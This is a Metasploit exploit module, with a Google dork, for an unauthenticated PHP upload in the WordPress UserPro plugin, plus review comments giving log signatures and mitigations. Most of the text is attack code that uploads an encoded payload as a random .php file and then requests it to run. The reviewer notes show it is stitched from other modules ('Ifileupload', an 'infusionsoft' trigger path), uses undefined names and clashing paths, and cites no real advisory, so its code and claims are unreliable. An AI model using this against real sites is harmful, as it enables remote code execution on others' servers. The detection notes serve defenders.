# Exploit Title : Wordpress Userpro Remote File Upload
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://userproplugin.com/
# Google Dork : inurl:/wp-content/plugins/userpro/
# Date : 10/20/2016
# Tested on : Windows10/Linux
#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
# NOTE(review): read this listing as an unverified claim, not as a vetted module.
#   - The title and target say "userpro", the description says "Ifileupload",
#     and the last request in #exploit goes to an "infusionsoft" plugin path,
#     so the text appears to be assembled from other modules.
#   - #check and #exploit build different paths to fileupload.php
#     (userpro/userpro/lib/... versus userpro/lib/...).
#   - The upload request's URI expression uses names that are not defined in
#     this listing, and fail_with is called with a single string; as published,
#     #exploit is expected to raise before any upload is attempted.
#   - The only reference is http://priv8.termijan/. No CVE, vendor advisory or
#     fixed version is cited, so ExcellentRanking is not backed by anything here.
#
# Defensive reading: the claimed weakness is an endpoint that, without
# authentication, writes a caller-named file with caller-supplied content under
# the plugin tree. In web access logs that would show as a POST to
# .../plugins/userpro/.../fileupload/fileupload.php carrying the form fields
# fileNamePattern and fileTemplate, followed by a request for a new .php file
# whose name is 8 to 15 random letters. The module registers the dropped file
# for cleanup, so server logs may be the only lasting trace. Mitigations that
# follow from the page: remove the plugin or update it (check the vendor
# changelog, since no fixed version is cited here), deny direct web access to
# plugin library scripts, and disable PHP execution in web-writable directories.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Wordpress Userpro unauthorization Upload Vulnerability',
      'Description' => %q{ This module exploits an arbitrary PHP code upload in the wordpress Ifileupload plugin, The vulnerability allows for unauthorization file upload and remote code execution. },
      'Author' => [
        'T3rm!nat0r5',
        'termijan <poyaterminator@gmail.com>'
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['Ref', 'http://priv8.termijan/'],
      ],
      'Privileged' => false,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['userpro', {}]],
      'DisclosureDate' => 'Oct 20 2016',
      'DefaultTarget' => 0
    }

    super(update_info(info, module_info))
  end

  # Fingerprints the plugin's file-upload script.
  #
  # Requests fileupload.php under the plugins directory and reports Detected
  # only on HTTP 200 with a body matching both /Code Generator/ and /userpro/.
  # This shows the script is reachable; it does not show that a write succeeds.
  #
  # @return [Exploit::CheckCode] Detected on a fingerprint match, otherwise Safe
  def check
    script_uri = normalize_uri(wordpress_url_plugins, 'userpro', 'userpro', 'lib', 'fileupload','fileupload.php')
    res = send_request_cgi('uri' => script_uri)

    fingerprinted = res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /userpro/
    return Exploit::CheckCode::Detected if fingerprinted

    Exploit::CheckCode::Safe
  end

  # Posts a randomly named .php file to the upload script, then requests it.
  #
  # NOTE(review): the URI arguments of the upload request and the plugin path
  # of the final request are reproduced exactly as published; see the header
  # note on why this method is not expected to run as written.
  def exploit
    # 8..15 random letters plus ".php"
    dropped_name = "#{rand_text_alpha(8 + rand(8))}.php"

    upload_request = {
      'uri' => normalize_uri(wp-content, 'plugins', 'userpro', 'lib', 'fileupload' , 'fileupload.php'),
      'method' => 'POST',
      'vars_post' => {
        'fileNamePattern' => dropped_name,
        'fileTemplate' => payload.encoded
      }
    }
    res = send_request_cgi(upload_request)

    accepted = res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
    if accepted
      # The line break inside this message is present in the listing as published.
      print_good("#{peer} - Our payload is at: #{dropped_name}. \nCalling payload...")
      register_files_for_cleanup(dropped_name)
    else
      # NOTE(review): res may be nil on this branch, in which case res.code raises.
      fail_with("#{peer} - Unable deploy payload, server returned #{res.code}")
    end

    print_status("#{peer} - Calling payload ...")
    trigger_uri = normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', dropped_name)
    send_request_cgi({ 'uri' => trigger_uri }, 2)
  end
end

# Exploit by T3rm!nat0r5